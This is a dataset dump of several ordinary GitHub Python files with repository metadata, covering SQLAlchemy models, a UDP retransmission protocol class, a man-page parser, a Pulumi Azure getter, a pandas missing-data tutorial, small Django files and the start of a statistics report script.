Dataset schema (column name, dtype, and the observed length range or number of distinct classes; "nullable" marks a column with nulls):

| column | dtype | lengths / classes |
|---|---|---|
| blob_id | string | length 40–40 |
| directory_id | string | length 40–40 |
| path | string | length 2–616 |
| content_id | string | length 40–40 |
| detected_licenses | list | length 0–69 |
| license_type | string | 2 classes |
| repo_name | string | length 5–118 |
| snapshot_id | string | length 40–40 |
| revision_id | string | length 40–40 |
| branch_name | string | length 4–63 |
| visit_date | timestamp[us] | |
| revision_date | timestamp[us] | |
| committer_date | timestamp[us] | |
| github_id | int64 | 2.91k–686M, nullable |
| star_events_count | int64 | 0–209k |
| fork_events_count | int64 | 0–110k |
| gha_license_id | string | 23 classes |
| gha_event_created_at | timestamp[us] | |
| gha_created_at | timestamp[us] | |
| gha_language | string | 213 classes |
| src_encoding | string | 30 classes |
| language | string | 1 class |
| is_vendor | bool | 2 classes |
| is_generated | bool | 2 classes |
| length_bytes | int64 | 2–10.3M |
| extension | string | 246 classes |
| content | string | length 2–10.3M |
| authors | list | length 1–1 |
| author_id | string | length 0–212 |

Each record below lists these fields in this order, one `|`-delimited cell at a time; the content cell carries the full source file.
385ed7afa8909d244246af00611da2c352bb1d35
|
d50d8911fa4980d9590454a31c979d427f77d81c
|
/models.py
|
81727d078707a1b8e0f70251de18168fdc7a0a24
|
[] |
no_license
|
Minigamy/TestTask2
|
1c9db9d3ad89b20e5af1d9c8a34936efb34d4320
|
38b4a9d4bc85c3d57f7872db98b3e9869eabf943
|
refs/heads/master
| 2023-06-16T01:13:38.967164
| 2021-07-08T20:55:44
| 2021-07-08T20:55:44
| 384,186,413
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 737
|
py
|
from sqlalchemy import Integer, BigInteger, VARCHAR, Text
from sqlalchemy.sql.schema import Column, ForeignKey
from database import Base
class Anagram(Base):
__tablename__ = "anagram"
id = Column(Integer, primary_key=True)
count = Column(Integer)
class Devices(Base):
__tablename__ = "devices"
id = Column(BigInteger, primary_key=True)
dev_id = Column(VARCHAR(200), nullable=False)
dev_type = Column(VARCHAR(120), nullable=False)
class Endpoints(Base):
__tablename__ = "endpoints"
id = Column(BigInteger, primary_key=True, nullable=False)
device_id = Column(Integer, ForeignKey('devices.id', ondelete="cascade", onupdate="cascade"), default=None)
comment = Column(Text, default=None)
|
[
"ferdinand-f@mail.ru"
] |
ferdinand-f@mail.ru
|
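A minimal usage sketch for the models.py file above, assuming the `database` module it imports exposes a standard SQLAlchemy declarative `Base`; the engine URL and the sample row are illustrative, not from the repo.

# Sketch of the database.py counterpart that models.py imports (assumed),
# plus table creation and a sample insert against an in-memory SQLite engine.
from sqlalchemy import create_engine
from sqlalchemy.orm import declarative_base, sessionmaker

engine = create_engine("sqlite:///:memory:")
Base = declarative_base()

# With the Anagram/Devices/Endpoints classes defined against this Base:
# Base.metadata.create_all(engine)  # creates the anagram/devices/endpoints tables
# session = sessionmaker(bind=engine)()
# session.add(Devices(dev_id="abc-123", dev_type="sensor"))
# session.commit()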
a1d6235994d31b5d3bf8f83841b12c2ae810fd81
|
e7c3f8a813cd7cae5978cbf2b0d54821214dfac7
|
/communicator.py
|
d40ff42ba7d573261e5d84b5bccbfa6d0ed199a9
|
[] |
no_license
|
gefunk/RxP-Protocol
|
1faa050858319f8dc18503b53f34f3035b111c83
|
7385a16231907dc82f8382f60074ee1462425765
|
refs/heads/master
| 2021-01-10T11:15:10.340194
| 2015-11-26T17:05:56
| 2015-11-26T17:05:56
| 46,640,711
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 7,719
|
py
|
import logging
import time
from threading import Timer
from packet import RxPacket
from packet import RxPFlags
from select import select
class RxPCommunicator:
def __init__(self,socket, loglevel=logging.DEBUG):
self.logger = logging.getLogger("RxPCommunicator")
self.loglevel = loglevel
# create console handler and set level to debug
self.logger.setLevel(loglevel)
# create console handler and set level to debug
ch = logging.StreamHandler()
ch.setLevel(loglevel)
# create formatter
formatter = logging.Formatter('%(asctime)s - %(name)s - %(levelname)s - %(message)s')
# add formatter to ch
ch.setFormatter(formatter)
# add ch to logger
self.logger.addHandler(ch)
# the buffer size used when reading from the socket
self.BUFFER_SIZE = 512
# set packet retry delay to 5 seconds
self.RETRY_DELAY = 5.0
# packets waiting to be acked, we keep this to check for resend
self.waiting_to_be_acked={}
# listeners registered via add_listener/remove_listener below
self.listeners = {}
# keep track of if the RETRY Thread Running
self.RETRY_THREAD = False
# set socket to the passed in socket
self.sock = socket
# packet sequence
self.packet_sequence_number = 0
# alive status
self.ALIVE = True
"""
Send a connection SYN ACK To tell the client that we are here and listening
We are going to ACKnowledge that we received the packet by sending the sequence number
we received as the ACK number
And tell the client to initialize by ACK our first packet
This is is a private method
"""
def sendCONNECTSYNACK(self, sourceip, sourceport, packet):
flags = [RxPFlags.SYN, RxPFlags.ACK]
ack = packet.sequence
seq = self.packet_sequence_number
synack_packet = RxPacket(
flags=flags,
sequence=seq,
ack=ack,
sourceip=sourceip,
destinationip=packet.sourceip,
sourceport=sourceport,
destport=packet.sourceport)
self.logger.debug("Sending SYNACK packet")
self.send_packet(synack_packet)
"""Send a SYN packet to initiate a connection with the server"""
def sendCONNECTSYN(self, sourceip, sourceport, destinationip, destport):
flags = [RxPFlags.SYN]
seq = self.__get_next_packet_sequence_number()
syn_packet = RxPacket(
flags,
seq,
sourceip=sourceip,
destinationip=destinationip,
sourceport=sourceport,
destport=destport)
self.logger.debug("Sending SYN Packet")
self.send_packet(syn_packet)
return seq
'''Send a packet to ACKnowledge a SYNACK or FIN packet'''
def sendACK(self, sourceport, sourceip, packet):
flags = [RxPFlags.ACK]
ack_packet = RxPacket(
flags=flags,
sequence=None,
ack=packet.sequence,
sourceip=sourceip,
destinationip=packet.sourceip,
sourceport=sourceport,
destport=packet.sourceport)
self.logger.debug("Sending ACK packet")
self.send_packet(ack_packet)
"""Send a SYN packet to initiate a connection with the server"""
def sendCONNECTFIN(self, sourceip, sourceport, destinationip, destport):
flags = [RxPFlags.FIN]
seq = self.__get_next_packet_sequence_number()
fin_packet = RxPacket(
flags,
seq,
sourceip=sourceip,
destinationip=destinationip,
sourceport=sourceport,
destport=destport)
self.logger.debug("Sending FIN Packet")
self.send_packet(fin_packet)
return seq
"""Send a SYN packet to initiate a connection with the server"""
def sendDATA(self, sourceip, sourceport, destinationip, destport, data_in_bytes):
flags = [RxPFlags.DATA]
seq = self.__get_next_packet_sequence_number()
data_packet = RxPacket(
flags,
seq,
sourceip=sourceip,
destinationip=destinationip,
sourceport=sourceport,
destport=destport,
data=data_in_bytes)
self.logger.debug("Sending DATA Packet")
self.send_packet(data_packet)
return seq
def __get_next_packet_sequence_number(self):
self.packet_sequence_number += 1
return self.packet_sequence_number
def add_listener(self, key, listener):
self.listeners[key] = listener
def remove_listener(self, key):
del self.listeners[key]
def receive_packet(self):
data,addr = self.sock.recvfrom(self.BUFFER_SIZE)
packet = RxPacket.deserialize(data)
self.logger.debug("Received packet: %s" % str(packet))
'''Check that the packet is not corrupt'''
if packet.checksum != RxPacket.calculate_checksum(packet):
self.logger.error("Corrupt Packet Detected, dropping packet %s", packet)
return None
# if packet contains an ACK, remove a waiting to be ACK'ed packet from the unacked list
if RxPFlags.ACK in packet.flags:
self.logger.debug("Waiting To be acked going to remove %s, these are the current keys: %s" % (packet.ack, self.waiting_to_be_acked.keys()))
self.waiting_to_be_acked.pop(packet.ack, None)  # tolerate duplicate ACKs without raising KeyError
return packet
'''Send packet to destination'''
def send_packet(self, packet):
packet.checksum = RxPacket.calculate_checksum(packet)
self.logger.debug("Sending packet to %s at port %s: " % (packet.destinationip, packet.destport))
# set the packet send time
packet.sent_time = time.time()
# if the packet needs to be acked then it has to be added to the waiting to be acked list
if any(flag in [RxPFlags.SYN, RxPFlags.FIN, RxPFlags.DATA] for flag in packet.flags):
self.waiting_to_be_acked[packet.sequence] = packet
# if the RETRY Thread is not running, kick it off
if not self.RETRY_THREAD:
t = Timer(self.RETRY_DELAY, self.resend_unacked_packets)
t.setDaemon(True)
t.start()
self.RETRY_THREAD = True
# Send packet over UDP
self.sock.sendto(RxPacket.serialize(packet), (packet.destinationip, packet.destport))
self.logger.debug("Sent Packet, returning to calling function")
# Check every time period to see if there are unacked packets to be sent
def resend_unacked_packets(self):
if self.waiting_to_be_acked:
self.logger.debug("This is how many packets are waiting for acks: %s" % len(self.waiting_to_be_acked.keys()))
# loop through the unacked packets and resend them
for unacked_packet in self.waiting_to_be_acked:
self.logger.debug("This is the sequence of the current unacked packet %s" % unacked_packet)
elapsed_time = time.time() - self.waiting_to_be_acked[unacked_packet].sent_time
if elapsed_time > self.RETRY_DELAY:
self.send_packet(self.waiting_to_be_acked[unacked_packet])
# tell the retry thread to try again after delay, we have to keep retrying till the acked packets are done
t = Timer(self.RETRY_DELAY, self.resend_unacked_packets)
t.setDaemon(True)
t.start()
self.RETRY_THREAD = True
else:
self.logger.debug("There are no packets waiting to be acked, killing RETRY THREAD")
self.RETRY_THREAD = False
|
[
"rahul.gokulnath@turner.com"
] |
rahul.gokulnath@turner.com
|
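The communicator above implements a simple retry scheme over an unreliable channel: every SYN/FIN/DATA packet is parked in waiting_to_be_acked, and a daemon Timer resends entries older than RETRY_DELAY until an ACK removes them. A wiring sketch, assuming packet.py provides the RxPacket/RxPFlags imported above; all addresses and ports are placeholders.

import socket

sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
sock.bind(("127.0.0.1", 5000))

comm = RxPCommunicator(sock)
seq = comm.sendCONNECTSYN("127.0.0.1", 5000, "127.0.0.1", 6000)
# The SYN is now parked in comm.waiting_to_be_acked[seq]; when the peer's
# SYN+ACK arrives, receive_packet() removes it, otherwise the Timer thread
# resends it every RETRY_DELAY seconds.
reply = comm.receive_packet()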
55410aad4488ccbb5b370d1a12553de6645c96a7
|
95f06aea954777d369c4b19db44202a4225833c8
|
/scripts/generate_manpage_metadata.py
|
51e64cea17f47acf2782e955046ecdb909e9d315
|
[
"Apache-2.0"
] |
permissive
|
cs-education/sysassets
|
25e2a4dac5af6f8f1d4d999628245779e9f98615
|
9a7b3d8e2fa1d4cd741c6d3b22522f8aa418261c
|
refs/heads/gh-pages
| 2021-01-17T10:16:44.739695
| 2018-03-27T04:24:49
| 2018-03-27T04:24:49
| 22,890,900
| 4
| 8
|
Apache-2.0
| 2018-12-22T08:58:37
| 2014-08-12T20:10:41
|
HTML
|
UTF-8
|
Python
| false
| false
| 6,486
|
py
|
import os
import os.path
import urllib
from bs4 import BeautifulSoup
import json
import re
if __name__ != '__main__':
print 'This script is not meant to be imported!'
exit()
c_function_signature_re = re.compile(ur'(.*)[(](.*)[)];')
include_re = re.compile(ur'#include\s+[<](.+)[>]\s*(.*)\s*')
define_re = re.compile(ur'#define\s+(.+)\s*')
def get_param_type_and_name(param_str):
param = param_str.strip().split()
param_type = ' '.join(param[:-1])
param_var_name = param[-1]
if param_var_name[0] == '*':
param_type += ' *'
param_var_name = param_var_name[1:]
return param_type, param_var_name
def parse_synopsis_text(text):
"""
Parse a Linux Man Page's Synopsis section for C function signatures, #includes and #defines
Can be used to extract information about a system call, etc.
:param text: Text (without extra formatting, like HTML tags)
from the synopsis section of the man page
:return: A 3-tuple of function signatures, includes and defines. Each 'function signature' is an
object with function metadata (return type, name, parameters). Each 'include' is a string of the
#include file path, and each 'define' is the text after #define.
"""
function_signatures = []
hash_includes = []
hash_defines = []
# TODO: This script needs to be changed
# I realized it is better to separate man page index and autocomplete metadata into separate json files
if text:
for line in text.split('\n\n'):
line = line.strip()
c_function_signature_match = re.match(c_function_signature_re, ' '.join(line.split()))
if c_function_signature_match:
# Function signature
parameters = []
for param in c_function_signature_match.group(2).split(','):
param = get_param_type_and_name(param)
parameters.append({
'type': param[0],
'var': param[1]
})
function_type_and_name = get_param_type_and_name(c_function_signature_match.group(1))
function_signatures.append({
'return_type': function_type_and_name[0],
'name': function_type_and_name[1],
'parameters': parameters
})
else:
for l in line.split('\n'):
l = l.strip()
include_match = re.match(include_re, l)
define_match = re.match(define_re, l)
if include_match:
# include
hash_includes.append({
'file_path': include_match.group(1),
'comments': include_match.group(2)
})
elif define_match:
# define
hash_defines.append({
'text': define_match.group(1)
})
else:
# TODO: some function signatures do not get parsed
# TODO: some functions need special linker flags, parse them too
pass
#print l
return function_signatures, hash_includes, hash_defines
# sysassets man pages directory
if os.path.basename(os.getcwd()) == 'scripts':
sysassets_dir = '../'
else:
sysassets_dir = './'
sysassets_dir = os.path.abspath(sysassets_dir)
man_pages_path = os.path.join(sysassets_dir, 'man_pages/')
# Man pages metadata output json file
man_page_index_json_out_filename = os.path.join(man_pages_path, 'sys_man_page_index.json')
syscall_metadata_json_out_filename = os.path.join(man_pages_path, 'syscall_metadata.json')
# Directory to man pages in HTML form, which contains index.html
man_pages_html_path = os.path.join(man_pages_path, 'html')
# List of man page section directories (man1, man2, ...)
man_pages_section_dirs = next(os.walk(man_pages_html_path))[1]
# The list containing the man pages index, to be converted to json later
man_page_index = []
# The list of system calls and their metadata for autocomplete support in sysbuild
syscalls = []
for section_dir in man_pages_section_dirs:
print section_dir
section = int(section_dir[-1])
section_dir_path = os.path.join(man_pages_html_path, section_dir)
# Get list of man page html files in the section directory
file_names = next(os.walk(section_dir_path))[2]
for man_page_file_name in file_names:
# Get man page name from filename, e.g., 'accept' from accept.2.html
man_page_name = man_page_file_name.split('.')[0]
# Get a relative link to the man page's HTML file
html_url = urllib.pathname2url(os.path.join('html', section_dir, man_page_file_name))
with open(os.path.join(section_dir_path, man_page_file_name), 'r') as f:
soup = BeautifulSoup(f)
if soup.title.string != 'Invalid Man Page':
summary = soup.h2.next_sibling.strip()
# Do not include URL to keep JSON size small, as it can be constructed on the client
man_page_index.append({
'name': man_page_name,
'section': section,
'summary': summary,
#'url': html_url
})
# Syscall metadata
synopsis = soup.h2.find_next_sibling('pre')
synopsis_text = ''
if synopsis:
synopsis_text = synopsis.get_text()
function_metadata = parse_synopsis_text(synopsis_text)
if function_metadata[0] or function_metadata[1] or function_metadata[2]:
# TODO: this format needs to be changed to have functions at the top level of the list
syscalls.append({
'man_page': man_page_name,
'functions': function_metadata[0],
'includes': function_metadata[1],
'defines': function_metadata[2]
})
with open(man_page_index_json_out_filename, 'w') as json_out_file:
json.dump(man_page_index, json_out_file, indent=4, sort_keys=True)
with open(syscall_metadata_json_out_filename, 'w') as json_out_file:
json.dump(syscalls, json_out_file, indent=4, sort_keys=True)
|
[
"gupta.neelabh@gmail.com"
] |
gupta.neelabh@gmail.com
|
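The synopsis parser above hinges on three regular expressions; here is a small self-contained rendering of the function-signature case (in Python 3 syntax, unlike the Python 2 script, and the sample line is made up):

import re

c_function_signature_re = re.compile(r'(.*)[(](.*)[)];')

sample = "int accept(int sockfd, struct sockaddr *addr);"
m = c_function_signature_re.match(sample)
return_type_and_name = m.group(1)                   # "int accept"
params = [p.strip() for p in m.group(2).split(',')]
print(return_type_and_name, params)                 # int accept ['int sockfd', 'struct sockaddr *addr']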
c9c1ad0ad8c72419dc88175791b797d14624cd57
|
82b946da326148a3c1c1f687f96c0da165bb2c15
|
/sdk/python/pulumi_azure_native/compute/get_capacity_reservation.py
|
f5d8a1ef2536b428a2df2b96675b3a4d7785f489
|
[
"Apache-2.0",
"BSD-3-Clause"
] |
permissive
|
morrell/pulumi-azure-native
|
3916e978382366607f3df0a669f24cb16293ff5e
|
cd3ba4b9cb08c5e1df7674c1c71695b80e443f08
|
refs/heads/master
| 2023-06-20T19:37:05.414924
| 2021-07-19T20:57:53
| 2021-07-19T20:57:53
| 387,815,163
| 0
| 0
|
Apache-2.0
| 2021-07-20T14:18:29
| 2021-07-20T14:18:28
| null |
UTF-8
|
Python
| false
| false
| 9,077
|
py
|
# coding=utf-8
# *** WARNING: this file was generated by the Pulumi SDK Generator. ***
# *** Do not edit by hand unless you're certain you know what you are doing! ***
import warnings
import pulumi
import pulumi.runtime
from typing import Any, Mapping, Optional, Sequence, Union, overload
from .. import _utilities
from . import outputs
__all__ = [
'GetCapacityReservationResult',
'AwaitableGetCapacityReservationResult',
'get_capacity_reservation',
]
@pulumi.output_type
class GetCapacityReservationResult:
"""
Specifies information about the capacity reservation.
"""
def __init__(__self__, id=None, instance_view=None, location=None, name=None, provisioning_state=None, provisioning_time=None, reservation_id=None, sku=None, tags=None, type=None, virtual_machines_associated=None, zones=None):
if id and not isinstance(id, str):
raise TypeError("Expected argument 'id' to be a str")
pulumi.set(__self__, "id", id)
if instance_view and not isinstance(instance_view, dict):
raise TypeError("Expected argument 'instance_view' to be a dict")
pulumi.set(__self__, "instance_view", instance_view)
if location and not isinstance(location, str):
raise TypeError("Expected argument 'location' to be a str")
pulumi.set(__self__, "location", location)
if name and not isinstance(name, str):
raise TypeError("Expected argument 'name' to be a str")
pulumi.set(__self__, "name", name)
if provisioning_state and not isinstance(provisioning_state, str):
raise TypeError("Expected argument 'provisioning_state' to be a str")
pulumi.set(__self__, "provisioning_state", provisioning_state)
if provisioning_time and not isinstance(provisioning_time, str):
raise TypeError("Expected argument 'provisioning_time' to be a str")
pulumi.set(__self__, "provisioning_time", provisioning_time)
if reservation_id and not isinstance(reservation_id, str):
raise TypeError("Expected argument 'reservation_id' to be a str")
pulumi.set(__self__, "reservation_id", reservation_id)
if sku and not isinstance(sku, dict):
raise TypeError("Expected argument 'sku' to be a dict")
pulumi.set(__self__, "sku", sku)
if tags and not isinstance(tags, dict):
raise TypeError("Expected argument 'tags' to be a dict")
pulumi.set(__self__, "tags", tags)
if type and not isinstance(type, str):
raise TypeError("Expected argument 'type' to be a str")
pulumi.set(__self__, "type", type)
if virtual_machines_associated and not isinstance(virtual_machines_associated, list):
raise TypeError("Expected argument 'virtual_machines_associated' to be a list")
pulumi.set(__self__, "virtual_machines_associated", virtual_machines_associated)
if zones and not isinstance(zones, list):
raise TypeError("Expected argument 'zones' to be a list")
pulumi.set(__self__, "zones", zones)
@property
@pulumi.getter
def id(self) -> str:
"""
Resource Id
"""
return pulumi.get(self, "id")
@property
@pulumi.getter(name="instanceView")
def instance_view(self) -> 'outputs.CapacityReservationInstanceViewResponse':
"""
The Capacity reservation instance view.
"""
return pulumi.get(self, "instance_view")
@property
@pulumi.getter
def location(self) -> str:
"""
Resource location
"""
return pulumi.get(self, "location")
@property
@pulumi.getter
def name(self) -> str:
"""
Resource name
"""
return pulumi.get(self, "name")
@property
@pulumi.getter(name="provisioningState")
def provisioning_state(self) -> str:
"""
The provisioning state, which only appears in the response.
"""
return pulumi.get(self, "provisioning_state")
@property
@pulumi.getter(name="provisioningTime")
def provisioning_time(self) -> str:
"""
The date time when the capacity reservation was last updated.
"""
return pulumi.get(self, "provisioning_time")
@property
@pulumi.getter(name="reservationId")
def reservation_id(self) -> str:
"""
A unique id generated and assigned to the capacity reservation by the platform which does not change throughout the lifetime of the resource.
"""
return pulumi.get(self, "reservation_id")
@property
@pulumi.getter
def sku(self) -> 'outputs.SkuResponse':
"""
SKU of the resource for which capacity needs to be reserved. The SKU name and capacity are required to be set. Currently VM SKUs with the capability called 'CapacityReservationSupported' set to true are supported. Refer to List Microsoft.Compute SKUs in a region (https://docs.microsoft.com/rest/api/compute/resourceskus/list) for supported values.
"""
return pulumi.get(self, "sku")
@property
@pulumi.getter
def tags(self) -> Optional[Mapping[str, str]]:
"""
Resource tags
"""
return pulumi.get(self, "tags")
@property
@pulumi.getter
def type(self) -> str:
"""
Resource type
"""
return pulumi.get(self, "type")
@property
@pulumi.getter(name="virtualMachinesAssociated")
def virtual_machines_associated(self) -> Sequence['outputs.SubResourceReadOnlyResponse']:
"""
A list of all virtual machine resource ids that are associated with the capacity reservation.
"""
return pulumi.get(self, "virtual_machines_associated")
@property
@pulumi.getter
def zones(self) -> Optional[Sequence[str]]:
"""
Availability Zone to use for this capacity reservation. The zone has to be a single value and should be part of the list of zones specified during the capacity reservation group creation. The zone can be assigned only during creation. If not provided, the reservation supports only non-zonal deployments. If provided, enforces the VM/VMSS using this capacity reservation to be in the same zone.
"""
return pulumi.get(self, "zones")
class AwaitableGetCapacityReservationResult(GetCapacityReservationResult):
# pylint: disable=using-constant-test
def __await__(self):
if False:
yield self
return GetCapacityReservationResult(
id=self.id,
instance_view=self.instance_view,
location=self.location,
name=self.name,
provisioning_state=self.provisioning_state,
provisioning_time=self.provisioning_time,
reservation_id=self.reservation_id,
sku=self.sku,
tags=self.tags,
type=self.type,
virtual_machines_associated=self.virtual_machines_associated,
zones=self.zones)
def get_capacity_reservation(capacity_reservation_group_name: Optional[str] = None,
capacity_reservation_name: Optional[str] = None,
expand: Optional[str] = None,
resource_group_name: Optional[str] = None,
opts: Optional[pulumi.InvokeOptions] = None) -> AwaitableGetCapacityReservationResult:
"""
Specifies information about the capacity reservation.
API Version: 2021-04-01.
:param str capacity_reservation_group_name: The name of the capacity reservation group.
:param str capacity_reservation_name: The name of the capacity reservation.
:param str expand: The expand expression to apply on the operation. 'InstanceView' retrieves a snapshot of the runtime properties of the capacity reservation that is managed by the platform and can change outside of control plane operations.
:param str resource_group_name: The name of the resource group.
"""
__args__ = dict()
__args__['capacityReservationGroupName'] = capacity_reservation_group_name
__args__['capacityReservationName'] = capacity_reservation_name
__args__['expand'] = expand
__args__['resourceGroupName'] = resource_group_name
if opts is None:
opts = pulumi.InvokeOptions()
if opts.version is None:
opts.version = _utilities.get_version()
__ret__ = pulumi.runtime.invoke('azure-native:compute:getCapacityReservation', __args__, opts=opts, typ=GetCapacityReservationResult).value
return AwaitableGetCapacityReservationResult(
id=__ret__.id,
instance_view=__ret__.instance_view,
location=__ret__.location,
name=__ret__.name,
provisioning_state=__ret__.provisioning_state,
provisioning_time=__ret__.provisioning_time,
reservation_id=__ret__.reservation_id,
sku=__ret__.sku,
tags=__ret__.tags,
type=__ret__.type,
virtual_machines_associated=__ret__.virtual_machines_associated,
zones=__ret__.zones)
|
[
"noreply@github.com"
] |
morrell.noreply@github.com
|
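A hedged caller sketch for the generated get_capacity_reservation above; it must run inside a Pulumi program, the module import path is assumed from the SDK layout, and every resource name below is a placeholder.

import pulumi
from pulumi_azure_native import compute  # assumes pulumi-azure-native is installed

result = compute.get_capacity_reservation(
    resource_group_name="my-rg",
    capacity_reservation_group_name="my-crg",
    capacity_reservation_name="my-cr",
    expand="InstanceView",
)
pulumi.export("reservationId", result.reservation_id)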
fd59de77217def418240e6c5174cc806f21f4db6
|
e966c35bafed154b4feb53c1ad2887670fae6c2e
|
/pandas/pandas kayıp ve bozuk veriler.py
|
5ae1728ef2a1c318c32ee53414b62af31ed8a93e
|
[] |
no_license
|
Apoles/python_kod
|
487544cacfc2fe8c7ebac3f5b6c1d211fe440112
|
a3b6d7e435c996ab9fba47fd3021649b8fbc7f71
|
refs/heads/main
| 2023-02-06T17:52:02.116873
| 2020-12-24T20:42:30
| 2020-12-24T20:42:30
| 324,232,400
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,334
|
py
|
import pandas as pd
import numpy as np
data=np.random.randint(10,100,15).reshape(5,3)
df=pd.DataFrame(data, index=["a","c","e","f","h"], columns=["clm1","clm2","clm3"])
df=df.reindex(["a","b","c","d","e","f","g","h"])
result=df
result=df.drop("clm1",axis=1) #colmuns 1 i siler
result=df.drop("a",axis=0) # a indexsini siler
result=df.isnull() # nan olan değerleri false olarak döndürür
result=df.notnull() # nan olmayan veri olan değerleri false döndürür
result=df.isnull().sum() #nan değerleri toplar kaç tane oldugunu gösterir
result=df["clm2"].isnull().sum() #columns 2 deki nan değerleri toplar
newColumn=[np.nan,30,np.nan,51,np.nan,10,20,90]
df["clmn4"]=newColumn #yeni columns olşturduk
#print(df)
result=df
result=df[df["clmn4"].isnull()] #column 4 deki nan ları getirir
result=df[df["clmn4"].isnull()]["clmn4"]["a"]
result=df.dropna() #satırda nan değeri v varsa satırı siler
result=df.dropna(axis=1) #sütüda nan değeri varsa sutunu siler
result=df.dropna(how="all") # tüm satır nan ise satırı siler
result=df.dropna(subset=["clm2","clm1"]) # subset metodu ile sadece column lara bakılır
result=df.dropna(subset=["clm2","clm1"],how="all")
result=df.fillna(value="no input") #nan değerlere kendimiz bilgi atayaibliyoruz
print(result)
|
[
"noreply@github.com"
] |
Apoles.noreply@github.com
|
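A tiny self-contained check of the dropna/fillna behavior the snippet above walks through; the two-row frame here is made up.

import numpy as np
import pandas as pd

df = pd.DataFrame({"clm1": [1.0, np.nan], "clm2": [np.nan, np.nan]})
print(df.dropna(how="all"))        # keeps row 0: it is not entirely NaN
print(df.dropna(subset=["clm1"]))  # drops row 1: clm1 is NaN there
print(df.fillna(value="no input")) # every NaN replaced by "no input"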
14e81ce0890ecae823ab6d5875ae15f4759c94de
|
c0e7af4c94102cb1c35cafd9cbf0916fcadf13f1
|
/dynamicApp/apps.py
|
8adeb1b77d1d4b97ea50e1afa5d372cda2926215
|
[
"Apache-2.0"
] |
permissive
|
TheMn/internet-engineering-project
|
e000e367a31556bc7a13fd7251883427168e7cda
|
54b748e23ffc93b081b4a0778108b7331a1db4e6
|
refs/heads/master
| 2023-07-29T14:29:45.327017
| 2023-07-18T06:58:05
| 2023-07-18T06:58:05
| 212,167,133
| 7
| 1
|
Apache-2.0
| 2022-12-08T11:58:23
| 2019-10-01T18:14:59
|
HTML
|
UTF-8
|
Python
| false
| false
| 95
|
py
|
from django.apps import AppConfig
class DynamicappConfig(AppConfig):
name = 'dynamicApp'
|
[
"mt.lroc@outlook.com"
] |
mt.lroc@outlook.com
|
cd896cba542a5374151a5c2ebe7a8c791ecac2c0
|
d9b880e62c4b3c9a4b5bdd49800ea02507c1b2e0
|
/medbank/middleware.py
|
c9462a1736ce88dfbc8f2e85ac97ab7ed0465dce
|
[] |
no_license
|
McHogardty/MedBank
|
e4a5c343fccecc26971585e963e935a3624c459a
|
96ace1001e55cd72f2d698dd72cb08ab0c76a6ef
|
refs/heads/master
| 2021-08-27T15:32:47.134071
| 2015-07-13T12:51:05
| 2015-07-13T12:51:05
| 39,011,489
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 263
|
py
|
from __future__ import unicode_literals
class ExtraErrorEmailInfoMiddleware(object):
def process_exception(self, request, exception):
try:
if request.user.is_authenticated():
request.META['USER_USERNAME'] = str(request.user.username)
except Exception:  # never let the extra-info hook itself break error reporting
pass
|
[
"michaelhagarty@gmail.com"
] |
michaelhagarty@gmail.com
|
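The middleware above only takes effect once registered in settings; a sketch of the old-style (pre-Django-1.10) MIDDLEWARE_CLASSES list that the process_exception hook above matches, with the dotted path inferred from the row's /medbank/middleware.py path:

# settings.py (sketch)
MIDDLEWARE_CLASSES = [
    'django.middleware.common.CommonMiddleware',
    'medbank.middleware.ExtraErrorEmailInfoMiddleware',
]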
9b778d789472cdacd42c7d77dad43deb6b558e28
|
fc0ddf3a03ab73f1da805ec9d590843f271ff713
|
/py/vr/stat.py
|
87752bdb478641f9e00050a79e8b11c403abcff1
|
[
"MIT"
] |
permissive
|
acorg/ssm-report
|
4abcf0aca821e2720c59cc1feae625925887abfe
|
eecb082c280a991116f15751bfd63da8c5680d1f
|
refs/heads/master
| 2022-04-28T02:11:42.883010
| 2022-03-29T08:14:02
| 2022-03-29T08:14:02
| 107,971,608
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 17,165
|
py
|
import logging; module_logger = logging.getLogger(__name__)
from pathlib import Path
import sys, datetime, collections, re, csv, json, subprocess, lzma
# ======================================================================
from .lab import lab_display_name
sVirusTypeForFilename = {"all": "all", "a(h3n2)": "h3n2", "a(h1n1)": "h1n1pdm", "h1seas": "h1n1seas", "h7": "h7", "h5": "h5", "b": "b", "victoria": "vic", "yamagata": "yam", "bvictoria": "bvic", "byamagata": "byam", "": ""}
sContinents = ["ASIA", "AUSTRALIA-OCEANIA", "NORTH-AMERICA", "EUROPE", "RUSSIA", "AFRICA", "MIDDLE-EAST", "SOUTH-AMERICA", "CENTRAL-AMERICA"]
# sLabOrder = ["CDC", "NIMR", "NIID", "MELB"]
sLabOrder = ["CDC", "Crick", "NIID", "VIDRL"]
sContinentsForTables = sContinents + ['all', 'sera', 'sera_unique']
sHeader = {'ASIA': 'Asia', 'AUSTRALIA-OCEANIA': 'Oceania', 'NORTH-AMERICA': 'N America ', 'EUROPE': 'Europe', 'RUSSIA': 'Russia', 'AFRICA': 'Africa',
'MIDDLE-EAST': 'M East', 'SOUTH-AMERICA': 'S America', 'CENTRAL-AMERICA': 'C America', 'all': 'TOTAL', 'month': 'Year-Mo', 'year': 'Year',
'sera': 'Sera', 'sera_unique': 'Sr Unique'}
sPeriodForFilename = {'year': '-year', 'month': ''}
sVirusTypeOrder = ['all', 'A(H1N1)', 'A(H3N2)', 'B', 'BVICTORIA', 'BYAMAGATA']
# ----------------------------------------------------------------------
def make_stat(output_dir, hidb_dir, start, end, previous_stat_dir, make_all_names=False, make_tabs=True, make_csv=True, make_webpage=True):
module_logger.info('Updating stat in {} start={} end={}'.format(output_dir, start, end))
stat = _compute_stat(output_dir=output_dir, hidb_dir=hidb_dir, start=start, end=end)
previous_stat = _load_previous_stat(previous_stat_dir=previous_stat_dir)
if make_tabs:
_make_tabs(output_dir, stat, previous_stat)
if make_csv:
_make_csv(output_dir, stat)
if make_webpage:
_make_webpage(output_dir, stat)
# ----------------------------------------------------------------------
def _compute_stat(output_dir, hidb_dir, start, end):
output_dir.mkdir(exist_ok=True)
output = output_dir.joinpath("stat.json.xz")
subprocess.check_call("hidb5-stat --start '{start}' --end '{end}' --db-dir '{db_dir}' '{output}'".format(start=start, end=end, db_dir=hidb_dir, output=output), shell=True)
return json.load(lzma.LZMAFile(output, "rb"))
# ----------------------------------------------------------------------
def _load_previous_stat(previous_stat_dir):
